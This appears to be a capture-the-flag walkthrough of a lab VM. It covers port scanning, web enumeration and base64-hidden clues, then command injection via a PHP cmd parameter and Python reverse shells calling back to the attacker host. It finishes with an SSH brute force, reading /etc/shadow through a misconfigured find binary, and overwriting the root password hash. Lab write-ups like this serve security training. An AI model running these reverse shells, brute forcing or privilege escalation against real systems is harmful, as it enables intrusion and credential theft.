[*]
1. Find host: nmap -sn 172.16.16.0/24
Nmap scan report for 172.16.16.32
Host is up (0.00020s latency).
MAC Address: 08:00:27:5B:F2:62 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.4
Host is up.

[*]
2. quick port scan: nmap 172.16.16.32
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5B:F2:62 (Oracle VirtualBox virtual NIC)

[*]
3. Service version scan:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:5B:F2:62 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

[*]
4. HTTP enumeration: nikto -h 172.16.16.32 && dirb http://172.16.16.32
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 23f, size: 59394284b0000, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.

---- Scanning URL: http://172.16.16.32/ ----
+ http://172.16.16.32/index.html 
+ http://172.16.16.32/robots.txt                                                                                        
+ http://172.16.16.32/server-status

[*]
5. Found artifact in robots.txt
super secret password - bG9sIHRyeSBoYXJkZXIgYnJvCg==
base64 decoded: lol try harder bro.

[*]
6. Found artifact in index.html on line 132 in a comment
curl -X GET --url http://172.16.16.32
<!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->
[*]
7. Decode string with base64, base64, and base64 (3 times encoded) to get: workinginprogress.php
[*]
8. Found artifict on that page:

<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>

<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
[*]
9. show command execution: http://172.16.16.32/workinginprogress.php?cmd=which%20python
/usr/bin/python 
[*]
10. Kick of reverse shell:
http://172.16.16.32/workinginprogress.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.16.4",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[*]
11. kick off more stable shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.16.4",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[*]
12. Get users: cat /etc/passwd | cut -d ':' -f1
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
_apt
systemd-timesync
systemd-network
systemd-resolve
messagebus
avahi-autoipd
cuong
systemd-coredump
sshd
[*]
13. Attempted to bruteforce in background: hydra -l cuong -P /usr/share/wordlists/rockyou.txt ssh://172.16.16.32 -t 4
[*]
14. Enumerate running ports: ss -l  
0.0.0.0:icmp                                                   0.0.0.0:*                                   
raw   UNCONN 768    0                                      *:ipv6-icmp                                                    *:*                                   
udp   UNCONN 0      0                                0.0.0.0:bootpc                                                 0.0.0.0:*                                   
tcp   LISTEN 0      128                              0.0.0.0:ssh                                                    0.0.0.0:*                                   
tcp   LISTEN 0      128                                    *:http                                                         *:*                                   
tcp   LISTEN 0      128                                 [::]:ssh   
[*]
15. Enumeration with linuxprivchecker:
    drwx-wx-wt 2 root root 4096 Dec 17  2018 /var/lib/php/sessions
    drwxrwxrwt 2 root root 4096 Dec 29 15:17 /var/tmp
    drwxrwxrwt 2 root root 4096 Dec 29 14:23 /tmp
    drwxrwxrwt 2 root root 40 Dec 29 14:23 /dev/mqueue
    drwxrwxrwt 2 root root 40 Dec 29 14:23 /dev/shm
    drwxrwxrwt 5 root root 100 Dec 29 14:23 /run/lock
[*]
16. Upload unix-priv-checker.sh, and run it
**found SGID binary /usr/bin/find. This means we can read/run files as root
$ which find
/usr/bin/find
[*]
17. display shadow file: find /etc/shadow -exec cat {} \;
root:$6$0e7sf95i/ATDbnUI$XbQWr.gJSCePVE6xRnVbPfICm.xfi4rrCANfiN.MqFOWGeZJwYn05mh4Nk.Y3HCb7Wt.Lx4sUoGn0KPz9tygA1:18166:0:99999:7:::
daemon:*:18166:0:99999:7:::
bin:*:18166:0:99999:7:::
sys:*:18166:0:99999:7:::
sync:*:18166:0:99999:7:::
games:*:18166:0:99999:7:::
man:*:18166:0:99999:7:::
lp:*:18166:0:99999:7:::
mail:*:18166:0:99999:7:::
news:*:18166:0:99999:7:::
uucp:*:18166:0:99999:7:::
proxy:*:18166:0:99999:7:::
www-data:*:18166:0:99999:7:::
backup:*:18166:0:99999:7:::
list:*:18166:0:99999:7:::
irc:*:18166:0:99999:7:::
gnats:*:18166:0:99999:7:::
nobody:*:18166:0:99999:7:::
_apt:*:18166:0:99999:7:::
systemd-timesync:*:18166:0:99999:7:::
systemd-network:*:18166:0:99999:7:::
systemd-resolve:*:18166:0:99999:7:::
messagebus:*:18166:0:99999:7:::
avahi-autoipd:*:18166:0:99999:7:::
cuong:$6$uX.U/zS7gu46oUm7$uiAbRYD90Kwidlube8E96MfjY6VTz4m.jQacwHOCd4dfAZ8rLCJZ49Euj.nF9NNd7Tq7LJNx53tu5EjuB8Lrs0:18166:0:99999:7:::
systemd-coredump:!!:18166::::::
sshd:*:18166:0:99999:7:::
[*]
18. This means we ran as root, and we can modify the passwd file if we want:
openssl passwd -1 "password"
$1$PMJjQiXH$PHbE.KgBPPyFNJGR2YEh41

find /etc/passwd -exec nano {} \;
**shell crashed** this means we need a better shell.
Check the nullbyte articate on upgrading to interactive shells with backgrounding the task and resetting hte terminal.
[*]
19. Edit the file and put in the hash:
root:$1$PMJjQiXH$PHbE.KgBPPyFNJGR2YEh41:0:0:root:/root:/bin/bash
[*]
20. Get the flag!
root@bossplayers:~# cat root.txt
Y29uZ3JhdHVsYXRpb25zCg==
[*]
21. Base64 decode flag: congratulations
[*]